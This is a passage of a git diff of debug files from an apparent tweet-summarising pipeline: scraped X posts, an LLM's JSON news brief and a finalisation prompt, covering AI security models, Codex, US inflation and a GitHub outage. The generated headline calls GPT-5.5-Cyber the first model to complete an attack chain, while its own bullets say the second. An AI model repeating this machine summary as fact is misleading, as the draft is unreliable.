悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 \n\nExcel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / RTF / Markdown \n\n操作只有两步: \n1)跟它说「帮我做一份 XX」 \n2)点导出 → 下载到本地或同步进 Drive \n\n意味着什么? \n\n普通用户从「问 AI」到「拿到", "url": "https://x.com/GoSailGlobal/status/2049872749850665004"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-30T14:47:31+00:00", "title": "R to @CuiMao: 本视频由seedance2生成,切勿当真!", "url": "https://x.com/CuiMao/status/2049863222195572817"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T14:44:27+00:00", "title": "x.com/i/article/204974126036…", "url": "https://x.com/GoSailGlobal/status/2049862449474740224"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T14:23:38+00:00", "title": "R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。\n\n据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距离的海外精准营销、国际化品牌打造、数字化技术赋能、全球流量对接等全链条服务,谷歌依托其在全球领先的科技实力,不仅可帮助企业降低出海成本、提升运营效率,推动“中国", "url": "https://x.com/realNyarime/status/2049857210659070441"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T14:22:45+00:00", "title": "据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔)\n\n将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营\n谷歌方面将联合各方优势资源,推出多项国内首创科技服务", "url": "https://x.com/realNyarime/status/2049856990957236483"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-30T14:03:29+00:00", "title": "R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK\nYoutube: https://youtu.be/aXToQKc430c\nApple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raises-%2445bn-but-falls-short-on-compute/id958230465?i=1000764648424", "url": "https://x.com/HarryStebbings/status/2049852141334904978"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-30T14:03:29+00:00", "title": "This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference.\n\n- Anthropic Raises $45BN but Falls Short on Compute\n- Are OpenAI Back in the Game with GPT5.5 & Codex?\n- Why Google is a Bigger Buy Than Ever Before\n- China Blocks Manus $2BN Deal to Met", "url": "https://x.com/HarryStebbings/status/2049852139690754293"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:36:52+00:00", "title": "Jerome Powell held 63 press conference as Fed chairman and over that time there wasn't a single question about the 40% money supply spike in 2020-21 or $18 trillion increase in the national debt during his tenure as the root causes of inflation.\n\nThat's either unbelievable incomp", "url": "https://x.com/charliebilello/status/2049845442842603574"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-30T13:35:30+00:00", "title": "补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。", "url": "https://x.com/Pluvio9yte/status/2049845097924342258"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T13:24:32+00:00", "title": "RT by @GoSailGlobal: x.com/i/article/204984109084…", "url": "https://x.com/GoSailGlobal/status/2049842340056174762"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:24:05+00:00", "title": "RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...", "url": "https://x.com/charliebilello/status/2049842225970852313"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T13:13:12+00:00", "title": "这下压力给到CAAC了,\n不过当年不予公开的原因是,可能危及国家安全、社会稳定😣", "url": "https://x.com/realNyarime/status/2049839485610029262"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:08:14+00:00", "title": "RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% target level. There will be no Fed rate cut in June and one could make a strong cas", "url": "https://x.com/charliebilello/status/2049838235866566668"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:02:00+00:00", "title": "RT by @charliebilello: Remember this the next time you find yourself in a turbulent market with bad news:\n1. You are a long-term investor\n2. Diversified portfolios are resilient\n3. Down markets present opportunities\n4. Corrections and bear markets have always given way to a recov", "url": "https://x.com/charliebilello/status/2049836667650089194"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:01:56+00:00", "title": "RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest we've seen in the past 30 years.", "url": "https://x.com/charliebilello/status/2049836652181307421"}] diff --git a/data/x_brief/debug/20260501_092840_l1_stage1_output.json b/data/x_brief/debug/20260501_092840_l1_stage1_output.json new file mode 100644 index 0000000..246df76 --- /dev/null +++ b/data/x_brief/debug/20260501_092840_l1_stage1_output.json @@ -0,0 +1,248 @@ +{ + "raw_text": "\n\n{\"headline\":\"GPT-5.5-Cyber成首个通过完整攻击链的AI安全模型,Codex升级抢非编码用户\",\"trending_keywords\":[\"GPT-5.5-Cyber\",\"Cursor Security Review\",\"Claude Security公测\",\"vibe coding\",\"S&P 500 7200\",\"Owl Alpha\"],\"themes\":[{\"id\":\"t1\",\"title\":\"AI安全模型分水岭:GPT-5.5-Cyber通过完整攻击链\",\"subtitle\":\"OpenAI首发网络安全前沿模型,Anthropic Mythos不再是唯一\",\"priority\":\"P0\",\"bullets\":[\"GPT-5.5-Cyber成为第二个能端到端完成整个攻击链的模型,首个是Anthropic的Mythos\",\"David Sacks:Mythos不是魔法也不是末日武器,只是自动化网络任务的开始\",\"OpenAI将在未来几天向关键网络防御者推出该模型\"],\"sample_urls\":[\"https://x.com/sama/status/2049712078836170843\",\"https://x.com/DavidSacks/status/2049907993588769006\",\"https://x.com/berryxia/status/2049987993193402677\"]},{\"id\":\"t2\",\"title\":\"Cursor安全能力升级:企业级代码审查进入自动化\",\"subtitle\":\"Security Review Agent全面开放,脆弱性扫描集成Slack\",\"priority\":\"P0\",\"bullets\":[\"Cursor Security Review现支持Teams和Enterprise计划\",\"两种Agent:Security Reviewer检查每个PR的漏洞并留评论;Vulnerability Scanner定期扫描代码库并发布到Slack\",\"开源三个入门项目:coding agent CLI、prototyping tool、agent-powered kanban board\"],\"sample_urls\":[\"https://x.com/cursor_ai/status/2049926283061035254\",\"https://x.com/cursor_ai/status/2049499866217185492\"]},{\"id\":\"t3\",\"title\":\"Sam Altman:Codex迎来ChatGPT时刻\",\"subtitle\":\"非编码计算机工作升级42%,Mac成为AI开发首选平台\",\"priority\":\"P1\",\"bullets\":[\"Codex大幅升级:Computer Use运行速度提升42%,支持非编码的日常计算机工作\",\"Perplexity采用GPT-5.5作为默认编排模型,Mac成为企业级AI助手首选平台\",\"Sam Altman:感觉Codex正在经历ChatGPT时刻\"],\"sample_urls\":[\"https://x.com/sama/status/2049946120441520624\",\"https://x.com/AravSrinivas/status/2047788775468908840\",\"https://x.com/AravSrinivas/status/2050007015616135365\"]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"GPT-5.5-Cyber网络攻击测试通过\",\"meta\":\"OpenAI | Sam Altman\",\"summary\":\"OpenAI前沿网络安全模型GPT-5.5-Cyber成功完成AI Security Institute设计的多步网络攻击模拟,成为第二个端到端完成攻击链的模型\",\"url\":\"https://x.com/sama/status/2049712078836170843\"},{\"id\":\"p02\",\"title\":\"Cursor Security Review开放企业版\",\"meta\":\"Cursor | 2026-04-30\",\"summary\":\"Teams和Enterprise计划可用Security Reviewer和Vulnerability Scanner两类Agent,PR漏洞检查和Slack告警自动化\",\"url\":\"https://x.com/cursor_ai/status/2049926283061035254\"},{\"id\":\"p03\",\"title\":\"Claude Security公测\",\"meta\":\"Anthropic | Berryxia\",\"summary\":\"Claude Security现已进入公测阶段,可指向代码仓库获取漏洞发现结果并原地修复\",\"url\":\"https://x.com/berryxia/status/2049998972484567491\"},{\"id\":\"p04\",\"title\":\"S&P 500首破7200\",\"meta\":\"Charlie Bilello | 2026-04-30\",\"summary\":\"标普500首次站上7200关口,过去一年从5600涨至7200,五年4200,十年2100\",\"url\":\"https://x.com/charliebilello/status/2049913908861792603\"},{\"id\":\"p05\",\"title\":\"Stripe Link CLI发布\",\"meta\":\"Stripe | Berryxia\",\"summary\":\"Agent支付基础设施:单次凭证+同步人工审批,Claude买礼物需FaceID确认\",\"url\":\"https://x.com/berryxia/status/2049985476334100833\"},{\"id\":\"p06\",\"title\":\"Karpathy:LLMs远不止加速既有工作\",\"meta\":\"Andrej Karpathy | Sequoia Ascent 2026\",\"summary\":\"Karpathy在 Sequoia Ascent 2026演讲:LLM新视野不仅是加速coding,还包括menugen、talkie等全新交互形态\",\"url\":\"https://x.com/karpathy/status/2049903821095354523\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"Mythos is not magic. It's not a doomsday device. It's the first of many models that can automate cyber tasks (just like coding).\",\"speaker\":\"David Sacks\",\"date\":\"2026-04-30\",\"note\":\"澄清对Anthropic Mythos的过度解读,强调AI安全模型的实用价值\",\"url\":\"https://x.com/DavidSacks/status/2049907993588769006\"},{\"id\":\"q2\",\"quote\":\"The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding).\",\"speaker\":\"Andrej Karpathy\",\"date\":\"2026-04-30\",\"note\":\"Sequoia Ascent 2026演讲核心观点:LLMs将催生全新人机交互形态\",\"url\":\"https://x.com/karpathy/status/2049903821095354523\"},{\"id\":\"q3\",\"quote\":\"feels like codex is having a chatgpt moment\",\"speaker\":\"Sam Altman\",\"date\":\"2026-04-29\",\"note\":\"Sam Altman对Codex产品阶段的判断,暗示AI编程工具临界点临近\",\"url\":\"https://x.com/sama/status/2049493609028923826\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"Grok Image Beta上线\",\"subtitle\":\"xAI创意Agent网页版灰度中\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/berryxia/status/2050002308759695561\"],\"item_texts\":[\"Grok Image Agent网页版Beta已上线付费用户灰度推送,可在无限开放画布独立完成规划→生成→编辑→迭代全流程\"]},{\"id\":\"c2\",\"title\":\"OpenGeometry开源发布\",\"subtitle\":\"建筑CAD领域的缺失关键层\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/berryxia/status/2050015402647027808\"],\"item_texts\":[\"Text→Floorplans→CAD→Render完整打通,从文本直接生成精准BREP CAD模型,Three.js实时渲染\"]},{\"id\":\"c3\",\"title\":\"GitHub两周连出三次故障\",\"subtitle\":\"第1299号用户含泪告别\",\"level\":\"WARN\",\"item_urls\":[\"https://x.com/GoSailGlobal/status/2049881037547999546\"],\"item_texts\":[\"merge queue bug导致2800+PR静默撤回、RCE漏洞、黑客可访问上百万仓库\"]},{\"id\":\"c4\",\"title\":\"谷歌入驻广州天河CBD\",\"subtitle\":\"Q3落地跨境数智服务\",\"level\":\"P2\",\"item_urls\":[\"https://x.com/realNyarime/status/2049856990957236483\"],\"item_texts\":[\"谷歌入驻广州国际金融中心(西塔),主攻跨境电商,预计Q3正式运营\"]},{\"id\":\"c5\",\"title\":\"Naval论vibe coding\",\"subtitle\":\"真奖励vs假多巴胺\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/GoSailGlobal/status/2049881966850499058\"],\"item_texts\":[\"游戏给假奖励真多巴胺,vibe coding给真奖励真多巴胺,目标是自己的,做的东西是真的\"]},{\"id\":\"c6\",\"title\":\"Andrew Ng新课程\",\"subtitle\":\"AI Prompting for Everyone\",\"level\":\"P2\",\"item_urls\":[\"https://x.com/AndrewYNg/status/2049886895530967534\"],\"item_urls_2\":[\"https://x.com/berryxia/status/2009981262934380898\"],\"item_texts\":[\"2026年提示词技术与2022年完全不同,推出新课程帮助各技能水平用户成为AI power user\"]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"GitHub基础设施风险\",\"detail\":\"两周内merge queue bug、RCE漏洞、API宕机频发,连18年老用户都含泪告别,开发者需警惕》\"},{\"id\":\"r2\",\"level\":\"HIGH\",\"title\":\"美国汽油价格9周暴涨44%\",\"detail\":\"从$2.98/gallon飙升至$4.30/gallon,创30年最大涨幅,加州突破$6.00/gallon\"},{\"id\":\"r3\",\"level\":\"MID\",\"title\":\"Core PCE通胀3.2%\",\"detail\":\"3月核心PCE达3.2%,创2023年11月以来新高,连续61个月高于美联储2%目标,6月降息预期渺茫\"},{\"id\":\"r4\",\"level\":\"MID\",\"title\":\"美国FCC拟撤销中资运营商授权\",\"detail\":\"提议禁止Verizon、AT&T等与中资运营商互联,电信、联通、移动、中信美国业务面临出局风险\"},{\"id\":\"r5\",\"level\":\"OPP\",\"title\":\"AI写作代码的调试冗余风险\",\"detail\":\"Gary Marcus:agentic code容易产生难以调试的冗余、安全漏洞、数据库误删等问题\"},{\"id\":\"r6\",\"level\":\"OPP\",\"title\":\"科技股估值争议\",\"detail\":\"Gary Marcus转发批评:Big Tech今年AI领域$7000亿投资是历史上最大的资本错配\"}]}", + "parsed_draft": { + "headline": "GPT-5.5-Cyber成首个通过完整攻击链的AI安全模型,Codex升级抢非编码用户", + "trending_keywords": [ + "GPT-5.5-Cyber", + "Cursor Security Review", + "Claude Security公测", + "vibe coding", + "S&P 500 7200", + "Owl Alpha" + ], + "themes": [ + { + "id": "t1", + "title": "AI安全模型分水岭:GPT-5.5-Cyber通过完整攻击链", + "subtitle": "OpenAI首发网络安全前沿模型,Anthropic Mythos不再是唯一", + "priority": "P0", + "bullets": [ + "GPT-5.5-Cyber成为第二个能端到端完成整个攻击链的模型,首个是Anthropic的Mythos", + "David Sacks:Mythos不是魔法也不是末日武器,只是自动化网络任务的开始", + "OpenAI将在未来几天向关键网络防御者推出该模型" + ], + "sample_urls": [ + "https://x.com/sama/status/2049712078836170843", + "https://x.com/DavidSacks/status/2049907993588769006", + "https://x.com/berryxia/status/2049987993193402677" + ] + }, + { + "id": "t2", + "title": "Cursor安全能力升级:企业级代码审查进入自动化", + "subtitle": "Security Review Agent全面开放,脆弱性扫描集成Slack", + "priority": "P0", + "bullets": [ + "Cursor Security Review现支持Teams和Enterprise计划", + "两种Agent:Security Reviewer检查每个PR的漏洞并留评论;Vulnerability Scanner定期扫描代码库并发布到Slack", + "开源三个入门项目:coding agent CLI、prototyping tool、agent-powered kanban board" + ], + "sample_urls": [ + "https://x.com/cursor_ai/status/2049926283061035254", + "https://x.com/cursor_ai/status/2049499866217185492" + ] + }, + { + "id": "t3", + "title": "Sam Altman:Codex迎来ChatGPT时刻", + "subtitle": "非编码计算机工作升级42%,Mac成为AI开发首选平台", + "priority": "P1", + "bullets": [ + "Codex大幅升级:Computer Use运行速度提升42%,支持非编码的日常计算机工作", + "Perplexity采用GPT-5.5作为默认编排模型,Mac成为企业级AI助手首选平台", + "Sam Altman:感觉Codex正在经历ChatGPT时刻" + ], + "sample_urls": [ + "https://x.com/sama/status/2049946120441520624", + "https://x.com/AravSrinivas/status/2047788775468908840", + "https://x.com/AravSrinivas/status/2050007015616135365" + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "GPT-5.5-Cyber网络攻击测试通过", + "meta": "OpenAI | Sam Altman", + "summary": "OpenAI前沿网络安全模型GPT-5.5-Cyber成功完成AI Security Institute设计的多步网络攻击模拟,成为第二个端到端完成攻击链的模型", + "url": "https://x.com/sama/status/2049712078836170843" + }, + { + "id": "p02", + "title": "Cursor Security Review开放企业版", + "meta": "Cursor | 2026-04-30", + "summary": "Teams和Enterprise计划可用Security Reviewer和Vulnerability Scanner两类Agent,PR漏洞检查和Slack告警自动化", + "url": "https://x.com/cursor_ai/status/2049926283061035254" + }, + { + "id": "p03", + "title": "Claude Security公测", + "meta": "Anthropic | Berryxia", + "summary": "Claude Security现已进入公测阶段,可指向代码仓库获取漏洞发现结果并原地修复", + "url": "https://x.com/berryxia/status/2049998972484567491" + }, + { + "id": "p04", + "title": "S&P 500首破7200", + "meta": "Charlie Bilello | 2026-04-30", + "summary": "标普500首次站上7200关口,过去一年从5600涨至7200,五年4200,十年2100", + "url": "https://x.com/charliebilello/status/2049913908861792603" + }, + { + "id": "p05", + "title": "Stripe Link CLI发布", + "meta": "Stripe | Berryxia", + "summary": "Agent支付基础设施:单次凭证+同步人工审批,Claude买礼物需FaceID确认", + "url": "https://x.com/berryxia/status/2049985476334100833" + }, + { + "id": "p06", + "title": "Karpathy:LLMs远不止加速既有工作", + "meta": "Andrej Karpathy | Sequoia Ascent 2026", + "summary": "Karpathy在 Sequoia Ascent 2026演讲:LLM新视野不仅是加速coding,还包括menugen、talkie等全新交互形态", + "url": "https://x.com/karpathy/status/2049903821095354523" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "Mythos is not magic. It's not a doomsday device. It's the first of many models that can automate cyber tasks (just like coding).", + "speaker": "David Sacks", + "date": "2026-04-30", + "note": "澄清对Anthropic Mythos的过度解读,强调AI安全模型的实用价值", + "url": "https://x.com/DavidSacks/status/2049907993588769006" + }, + { + "id": "q2", + "quote": "The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding).", + "speaker": "Andrej Karpathy", + "date": "2026-04-30", + "note": "Sequoia Ascent 2026演讲核心观点:LLMs将催生全新人机交互形态", + "url": "https://x.com/karpathy/status/2049903821095354523" + }, + { + "id": "q3", + "quote": "feels like codex is having a chatgpt moment", + "speaker": "Sam Altman", + "date": "2026-04-29", + "note": "Sam Altman对Codex产品阶段的判断,暗示AI编程工具临界点临近", + "url": "https://x.com/sama/status/2049493609028923826" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "Grok Image Beta上线", + "subtitle": "xAI创意Agent网页版灰度中", + "level": "P1", + "item_urls": [ + "https://x.com/berryxia/status/2050002308759695561" + ], + "item_texts": [ + "Grok Image Agent网页版Beta已上线付费用户灰度推送,可在无限开放画布独立完成规划→生成→编辑→迭代全流程" + ] + }, + { + "id": "c2", + "title": "OpenGeometry开源发布", + "subtitle": "建筑CAD领域的缺失关键层", + "level": "P1", + "item_urls": [ + "https://x.com/berryxia/status/2050015402647027808" + ], + "item_texts": [ + "Text→Floorplans→CAD→Render完整打通,从文本直接生成精准BREP CAD模型,Three.js实时渲染" + ] + }, + { + "id": "c3", + "title": "GitHub两周连出三次故障", + "subtitle": "第1299号用户含泪告别", + "level": "WARN", + "item_urls": [ + "https://x.com/GoSailGlobal/status/2049881037547999546" + ], + "item_texts": [ + "merge queue bug导致2800+PR静默撤回、RCE漏洞、黑客可访问上百万仓库" + ] + }, + { + "id": "c4", + "title": "谷歌入驻广州天河CBD", + "subtitle": "Q3落地跨境数智服务", + "level": "P2", + "item_urls": [ + "https://x.com/realNyarime/status/2049856990957236483" + ], + "item_texts": [ + "谷歌入驻广州国际金融中心(西塔),主攻跨境电商,预计Q3正式运营" + ] + }, + { + "id": "c5", + "title": "Naval论vibe coding", + "subtitle": "真奖励vs假多巴胺", + "level": "P1", + "item_urls": [ + "https://x.com/GoSailGlobal/status/2049881966850499058" + ], + "item_texts": [ + "游戏给假奖励真多巴胺,vibe coding给真奖励真多巴胺,目标是自己的,做的东西是真的" + ] + }, + { + "id": "c6", + "title": "Andrew Ng新课程", + "subtitle": "AI Prompting for Everyone", + "level": "P2", + "item_urls": [ + "https://x.com/AndrewYNg/status/2049886895530967534" + ], + "item_urls_2": [ + "https://x.com/berryxia/status/2009981262934380898" + ], + "item_texts": [ + "2026年提示词技术与2022年完全不同,推出新课程帮助各技能水平用户成为AI power user" + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "GitHub基础设施风险", + "detail": "两周内merge queue bug、RCE漏洞、API宕机频发,连18年老用户都含泪告别,开发者需警惕》" + }, + { + "id": "r2", + "level": "HIGH", + "title": "美国汽油价格9周暴涨44%", + "detail": "从$2.98/gallon飙升至$4.30/gallon,创30年最大涨幅,加州突破$6.00/gallon" + }, + { + "id": "r3", + "level": "MID", + "title": "Core PCE通胀3.2%", + "detail": "3月核心PCE达3.2%,创2023年11月以来新高,连续61个月高于美联储2%目标,6月降息预期渺茫" + }, + { + "id": "r4", + "level": "MID", + "title": "美国FCC拟撤销中资运营商授权", + "detail": "提议禁止Verizon、AT&T等与中资运营商互联,电信、联通、移动、中信美国业务面临出局风险" + }, + { + "id": "r5", + "level": "OPP", + "title": "AI写作代码的调试冗余风险", + "detail": "Gary Marcus:agentic code容易产生难以调试的冗余、安全漏洞、数据库误删等问题" + }, + { + "id": "r6", + "level": "OPP", + "title": "科技股估值争议", + "detail": "Gary Marcus转发批评:Big Tech今年AI领域$7000亿投资是历史上最大的资本错配" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260501_092840_l1_stage2_input.txt b/data/x_brief/debug/20260501_092840_l1_stage2_input.txt new file mode 100644 index 0000000..384c468 --- /dev/null +++ b/data/x_brief/debug/20260501_092840_l1_stage2_input.txt @@ -0,0 +1,35 @@ +[meta] + +phase=stage2_finalize + +tweets=120 + + + +[prompt] + +你是“X资讯月报总编”。请基于阶段1草案,输出最终可渲染 JSON(阶段2定稿)。 + +要求: +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 必须严格使用最终字段: +{ + "headline":"今日一句话总结,<40字,点出主旋律", + "trending_keywords":["关键词1","关键词2","关键词3"], + "themes":[{"id":"t1","title":"...","subtitle":"...","priority":"P0|P1|P2","bullets":["..."],"samples":[{"text":"...","url":"...","handle":"...","date":"..."}]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","items":[{"text":"...","url":"..."}]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 保证 JSON 合法(双引号、无尾逗号)。 +4) 引用 URL 时,优先从“推文索引”中取值;samples/items 尽量带 url。 +5) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +6) 严格保留 stage1 草案中每个 theme 的 priority 字段(P0/P1/P2)。 +7) 严格保留 stage1 草案中的 trending_keywords 数组。 + +阶段1草案(JSON): +{"headline": "GPT-5.5-Cyber成首个通过完整攻击链的AI安全模型,Codex升级抢非编码用户", "trending_keywords": ["GPT-5.5-Cyber", "Cursor Security Review", "Claude Security公测", "vibe coding", "S&P 500 7200", "Owl Alpha"], "themes": [{"id": "t1", "title": "AI安全模型分水岭:GPT-5.5-Cyber通过完整攻击链", "subtitle": "OpenAI首发网络安全前沿模型,Anthropic Mythos不再是唯一", "priority": "P0", "bullets": ["GPT-5.5-Cyber成为第二个能端到端完成整个攻击链的模型,首个是Anthropic的Mythos", "David Sacks:Mythos不是魔法也不是末日武器,只是自动化网络任务的开始", "OpenAI将在未来几天向关键网络防御者推出该模型"], "sample_urls": ["https://x.com/sama/status/2049712078836170843", "https://x.com/DavidSacks/status/2049907993588769006", "https://x.com/berryxia/status/2049987993193402677"]}, {"id": "t2", "title": "Cursor安全能力升级:企业级代码审查进入自动化", "subtitle": "Security Review Agent全面开放,脆弱性扫描集成Slack", "priority": "P0", "bullets": ["Cursor Security Review现支持Teams和Enterprise计划", "两种Agent:Security Reviewer检查每个PR的漏洞并留评论;Vulnerability Scanner定期扫描代码库并发布到Slack", "开源三个入门项目:coding agent CLI、prototyping tool、agent-powered kanban board"], "sample_urls": ["https://x.com/cursor_ai/status/2049926283061035254", "https://x.com/cursor_ai/status/2049499866217185492"]}, {"id": "t3", "title": "Sam Altman:Codex迎来ChatGPT时刻", "subtitle": "非编码计算机工作升级42%,Mac成为AI开发首选平台", "priority": "P1", "bullets": ["Codex大幅升级:Computer Use运行速度提升42%,支持非编码的日常计算机工作", "Perplexity采用GPT-5.5作为默认编排模型,Mac成为企业级AI助手首选平台", "Sam Altman:感觉Codex正在经历ChatGPT时刻"], "sample_urls": ["https://x.com/sama/status/2049946120441520624", "https://x.com/AravSrinivas/status/2047788775468908840", "https://x.com/AravSrinivas/status/2050007015616135365"]}], "p0_events": [{"id": "p01", "title": "GPT-5.5-Cyber网络攻击测试通过", "meta": "OpenAI | Sam Altman", "summary": "OpenAI前沿网络安全模型GPT-5.5-Cyber成功完成AI Security Institute设计的多步网络攻击模拟,成为第二个端到端完成攻击链的模型", "url": "https://x.com/sama/status/2049712078836170843"}, {"id": "p02", "title": "Cursor Security Review开放企业版", "meta": "Cursor | 2026-04-30", "summary": "Teams和Enterprise计划可用Security Reviewer和Vulnerability Scanner两类Agent,PR漏洞检查和Slack告警自动化", "url": "https://x.com/cursor_ai/status/2049926283061035254"}, {"id": "p03", "title": "Claude Security公测", "meta": "Anthropic | Berryxia", "summary": "Claude Security现已进入公测阶段,可指向代码仓库获取漏洞发现结果并原地修复", "url": "https://x.com/berryxia/status/2049998972484567491"}, {"id": "p04", "title": "S&P 500首破7200", "meta": "Charlie Bilello | 2026-04-30", "summary": "标普500首次站上7200关口,过去一年从5600涨至7200,五年4200,十年2100", "url": "https://x.com/charliebilello/status/2049913908861792603"}, {"id": "p05", "title": "Stripe Link CLI发布", "meta": "Stripe | Berryxia", "summary": "Agent支付基础设施:单次凭证+同步人工审批,Claude买礼物需FaceID确认", "url": "https://x.com/berryxia/status/2049985476334100833"}, {"id": "p06", "title": "Karpathy:LLMs远不止加速既有工作", "meta": "Andrej Karpathy | Sequoia Ascent 2026", "summary": "Karpathy在 Sequoia Ascent 2026演讲:LLM新视野不仅是加速coding,还包括menugen、talkie等全新交互形态", "url": "https://x.com/karpathy/status/2049903821095354523"}], "top_quotes": [{"id": "q1", "quote": "Mythos is not magic. It's not a doomsday device. It's the first of many models that can automate cyber tasks (just like coding).", "speaker": "David Sacks", "date": "2026-04-30", "note": "澄清对Anthropic Mythos的过度解读,强调AI安全模型的实用价值", "url": "https://x.com/DavidSacks/status/2049907993588769006"}, {"id": "q2", "quote": "The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding).", "speaker": "Andrej Karpathy", "date": "2026-04-30", "note": "Sequoia Ascent 2026演讲核心观点:LLMs将催生全新人机交互形态", "url": "https://x.com/karpathy/status/2049903821095354523"}, {"id": "q3", "quote": "feels like codex is having a chatgpt moment", "speaker": "Sam Altman", "date": "2026-04-29", "note": "Sam Altman对Codex产品阶段的判断,暗示AI编程工具临界点临近", "url": "https://x.com/sama/status/2049493609028923826"}], "category_updates": [{"id": "c1", "title": "Grok Image Beta上线", "subtitle": "xAI创意Agent网页版灰度中", "level": "P1", "item_urls": ["https://x.com/berryxia/status/2050002308759695561"], "item_texts": ["Grok Image Agent网页版Beta已上线付费用户灰度推送,可在无限开放画布独立完成规划→生成→编辑→迭代全流程"]}, {"id": "c2", "title": "OpenGeometry开源发布", "subtitle": "建筑CAD领域的缺失关键层", "level": "P1", "item_urls": ["https://x.com/berryxia/status/2050015402647027808"], "item_texts": ["Text→Floorplans→CAD→Render完整打通,从文本直接生成精准BREP CAD模型,Three.js实时渲染"]}, {"id": "c3", "title": "GitHub两周连出三次故障", "subtitle": "第1299号用户含泪告别", "level": "WARN", "item_urls": ["https://x.com/GoSailGlobal/status/2049881037547999546"], "item_texts": ["merge queue bug导致2800+PR静默撤回、RCE漏洞、黑客可访问上百万仓库"]}, {"id": "c4", "title": "谷歌入驻广州天河CBD", "subtitle": "Q3落地跨境数智服务", "level": "P2", "item_urls": ["https://x.com/realNyarime/status/2049856990957236483"], "item_texts": ["谷歌入驻广州国际金融中心(西塔),主攻跨境电商,预计Q3正式运营"]}, {"id": "c5", "title": "Naval论vibe coding", "subtitle": "真奖励vs假多巴胺", "level": "P1", "item_urls": ["https://x.com/GoSailGlobal/status/2049881966850499058"], "item_texts": ["游戏给假奖励真多巴胺,vibe coding给真奖励真多巴胺,目标是自己的,做的东西是真的"]}, {"id": "c6", "title": "Andrew Ng新课程", "subtitle": "AI Prompting for Everyone", "level": "P2", "item_urls": ["https://x.com/AndrewYNg/status/2049886895530967534"], "item_urls_2": ["https://x.com/berryxia/status/2009981262934380898"], "item_texts": ["2026年提示词技术与2022年完全不同,推出新课程帮助各技能水平用户成为AI power user"]}], "risk_signals": [{"id": "r1", "level": "HIGH", "title": "GitHub基础设施风险", "detail": "两周内merge queue bug、RCE漏洞、API宕机频发,连18年老用户都含泪告别,开发者需警惕》"}, {"id": "r2", "level": "HIGH", "title": "美国汽油价格9周暴涨44%", "detail": "从$2.98/gallon飙升至$4.30/gallon,创30年最大涨幅,加州突破$6.00/gallon"}, {"id": "r3", "level": "MID", "title": "Core PCE通胀3.2%", "detail": "3月核心PCE达3.2%,创2023年11月以来新高,连续61个月高于美联储2%目标,6月降息预期渺茫"}, {"id": "r4", "level": "MID", "title": "美国FCC拟撤销中资运营商授权", "detail": "提议禁止Verizon、AT&T等与中资运营商互联,电信、联通、移动、中信美国业务面临出局风险"}, {"id": "r5", "level": "OPP", "title": "AI写作代码的调试冗余风险", "detail": "Gary Marcus:agentic code容易产生难以调试的冗余、安全漏洞、数据库误删等问题"}, {"id": "r6", "level": "OPP", "title": "科技股估值争议", "detail": "Gary Marcus转发批评:Big 